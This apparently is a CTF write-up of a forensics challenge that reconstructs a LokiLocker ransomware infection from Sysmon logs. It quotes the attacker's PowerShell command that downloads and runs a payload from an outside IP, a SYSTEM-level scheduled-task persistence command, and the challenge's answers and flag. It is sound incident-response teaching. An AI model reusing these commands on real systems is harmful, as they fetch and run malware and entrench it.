Post

Valhalloween

Challenge

  • CTF: Hack The Boo 2023
  • Name: Valhalloween
  • Category: Forensics
  • Difficulty: Medium
  • Points: 1000
  • Description: As I was walking the neighbor’s streets for some Trick-or-Treat, a strange man approached me, saying he was dressed as ““The God of Mischief!””. He handed me some candy and disappeared. Among the candy bars was a USB in disguise, and when I plugged it into my computer, all my files were corrupted! First, spawn the haunted Docker instance and connect to it! Dig through the horrors that lie in the given Logs and answer whatever questions are asked of you!
  • Objective: Microsoft Event Log SysLog Incident Response

Files

Download: forensics_valhalloween.zip

Writeup

The challenge contains 366 .evtx files that are Windows Event Log files. The Microsoft Sysmon event viewer log file of Microsoft-Windows-Sysmon%4Operational.evtx can be converted to XML file for easy analysis as shown below:

1
evtxexport Microsoft-Windows-Sysmon%4Operational.evtx -f xml > sysmon.xml

After spinnning up a docker instance, you can connect to it via netcat and are prompted with various questions to answer. The last question answered will provide the flag to complete the challenge.

Q1: What are the IP address and port of the server from which the malicious actors downloaded the ransomware? (for example: 98.76.54.32:443)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see the malware being downloaded from http://103.162.14.116:8888/mscalc.exe that was run from a Microsoft Word process.

1
2
3
4
5
6
<TimeCreated SystemTime="2023-09-20T03:03:22.905760700Z"/>
<EventRecordID>3837</EventRecordID>
..[snip]..
<Data Name="CommandLine">c:\\microsoft\\office\\word\\document\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c powershell.exe (new-object system.net.webclient).downloadfile('http://103.162.14.116:8888/mscalc.exe','%%temp%%\mscalc.exe');start-process '%%temp%%\mscalc.exe'</Data>
..[snip]..
<Data Name="ParentCommandLine">"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\HoaGay\Documents\Subjects\Unexpe.docx" /o ""</Data>
1
2
> 103.162.14.116:8888
[+] Correct!

Q2: According to the sysmon logs, what is the MD5 hash of the ransomware? (for example: 6ab0e507bcc2fad463959aa8be2d782f)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see the payload is run mscalc.exe and SysMon log captured the MD5 hash.

1
2
3
4
5
6
7
<TimeCreated SystemTime="2023-09-20T03:03:24.8085843Z" />
<EventRecordID>3844</EventRecordID>
..[snip]..
<Data Name="Image">C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe</Data>
<Data Name="CommandLine">"C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe"
..[snip]..
<Data Name="Hashes">MD5=B94F3FF666D9781CB69088658CD53772</Data>
1
2
> B94F3FF666D9781CB69088658CD53772
[+] Correct!

Q3: Based on the hash found, determine the family label of the ransomware in the wild from online reports such as Virus Total, Hybrid Analysis, etc. (for example: wannacry)

Searching the MD5sum in VirusTotal led to a threat label of ransomware.lokilocker/msil

1
2
> lokilocker
[+] Correct!

Q4: What is the name of the task scheduled by the ransomware? (for example: WindowsUpdater)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see a persistent scheduled task created called “Loki”. You can also see this same process in behavioral statistics in VirusTotal .

1
<Data Name="CommandLine">"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\HoaGay\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F</Data>
1
2
> Loki
[+] Correct!

Q5: What are the parent process name and ID of the ransomware process? (for example: svchost.exe_4953)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see the parent process id is 3856 from powershell.exe.

1
2
3
4
5
6
7
8
9
10
11
<TimeCreated SystemTime="2023-09-20T03:03:24.8085843Z" />
<EventRecordID>3844</EventRecordID>
..[snip]..
<Data Name="Image">C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe</Data>
<Data Name="CommandLine">"C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe"
..[snip]..
<Data Name="Hashes">MD5=B94F3FF666D9781CB69088658CD53772</Data>
<Data Name="ParentProcessGuid">{335CB4AA-60FB-650A-0001-000000000D00}</Data>
<Data Name="ParentProcessId">3856</Data>
<Data Name="ParentImage">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="ParentCommandLine">powershell.exe  (new-object system.net.webclient).downloadfile('http://103.162.14.116:8888/mscalc.exe','C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe');start-process 'C:\Users\HoaGay\AppData\Local\Temp\mscalc.exe'</Data>
1
2
> powershell.exe_3856
[+] Correct!

Q6: Following the PPID, provide the file path of the initial stage in the infection chain. (for example: D:\Data\KCorp\FirstStage.pdf)

In Microsoft-Windows-Sysmon%4Operational.evtx, we see the original filename as Unexpe.docx that was run from a Microsoft Word process.

1
2
3
4
5
6
7
8
9
10
11
12
<TimeCreated SystemTime="2023-09-20T03:03:20.2610014Z" />
<EventRecordID>3802</EventRecordID>
..[snip]..
<Data Name="Image">C:\Program Files\Microsoft Office\Office15\WINWORD.EXE</Data>
<Data Name="FileVersion">15.0.4420.1017</Data>
<Data Name="Description">Microsoft Word</Data>
<Data Name="Product">Microsoft Office 2013</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">WinWord.exe</Data>
<Data Name="CommandLine">"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\HoaGay\Documents\Subjects\Unexpe.docx" /o ""</Data>
<Data Name="CurrentDirectory">C:\Users\HoaGay\Documents\Subjects\</Data>
<Data Name="User">DESKTOP-V0F35DT\HoaGay</Data>
1
2
> C:\Users\HoaGay\Documents\Subjects\Unexpe.docx
[+] Correct!

Q7: When was the first file in the infection chain opened (in UTC)? (for example: 1975-04-30_12:34:56)

As shown above in Q6, the systemtime recorded was 2023-09-20T03:03:20.2610014Z.

1
2
3
4
> 2023-09-20_03:03:20
[+] Correct!

[+] Here is the flag: HTB{N0n3_c4n_ru1n_th3_H@ll0w33N_Sp1r1t}

Flag: HTB{N0n3_c4n_ru1n_th3_H@ll0w33N_Sp1r1t}

This post is licensed under CC BY 4.0 by the author.